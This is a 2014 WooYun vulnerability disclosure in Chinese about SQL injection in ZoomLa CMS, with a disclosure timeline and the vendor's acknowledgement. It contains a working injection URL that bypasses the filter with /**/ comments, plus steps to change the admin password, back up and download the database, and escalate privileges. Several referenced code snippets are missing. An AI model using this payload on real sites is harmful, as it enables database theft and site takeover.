漏洞概要
关注数(24)
关注此漏洞
漏洞标题:逐浪CMS任意SQL游走CMS2 V1.4 V1.5、 CMS6.0均受影响(其他版本死链未测)
提交时间:2014-04-11 16:29
修复时间:2014-07-10 16:30
公开时间:2014-07-10 16:30
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-04-11: 细节已通知厂商并且等待厂商处理中
2014-04-11: 厂商已经确认,细节仅向厂商公开
2014-04-14: 细节向第三方安全合作伙伴开放
2014-06-05: 细节向核心白帽子及相关领域专家公开
2014-06-15: 细节向普通白帽子公开
2014-06-25: 细节向实习白帽子公开
2014-07-10: 细节向公众公开
简要描述:
问题出现在详细说明中
详细说明:
问题出现在
代码片段:
那么这里我们构造SQL
(1)
这里值得注意的是 先提交(
)然后再提交(1)原因在第一段代码中
但是这个地方是有防注入 咱们看一下逐浪的防注入代码 :
绕过方式 在关键字紧挨的地方加上/**/即可绕过
(2)
修改管理员密码:
(3)获取网站物理路径
然后用管理员账号登陆后台打开
http://192.168.0.103:8885/manage/Common/SystemFinger.aspx
可得到物理程序路径 G:\程序发布\Zoomla!CMS2_x1.5\Zoomla!CMS2_x1.5源码\
(4)获取数据库
那么执行: http://192.168.0.103:8885/User/Develop/ashx/UserTage.ashx?v2=Addpage&NodeID=1&style=1^222222;update/**/ dbo.ZL_User set Email=(select/**/ db_name()) where UserName='admin'--|2^333333
然后刷新自己资料
得到数据库名称 ZoomLa1.5
(5)备份数据库并下载:
然后访问http://192.168.0.103:8885/123.rar 即可下载数据库
有人会问 为什么备份成rar 其实是因为有些IIS没有设置bak的MIME
另外可以查看当前用户权限 如果sa的话 也可以备份其他数据库 提权 之类的各自淫荡吧
漏洞证明:
CMS2 V1.5
CMS2 V1.4
CMS 6.0
其他版本
看修改时间 应该其他版本也受影响
主要是没有找到1.0 1.1 1.2 1.3 的资源
修复方案:
其他参数都参数化了 为何偏偏要偷懒一点那
sql注入有点小弱
版权声明:转载请注明来源 Damo@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:5
确认时间:2014-04-11 18:09
厂商回复:
感谢反馈。
最新状态:
2014-04-12:已更新纠正,团队协作审查不严,必将加强改正。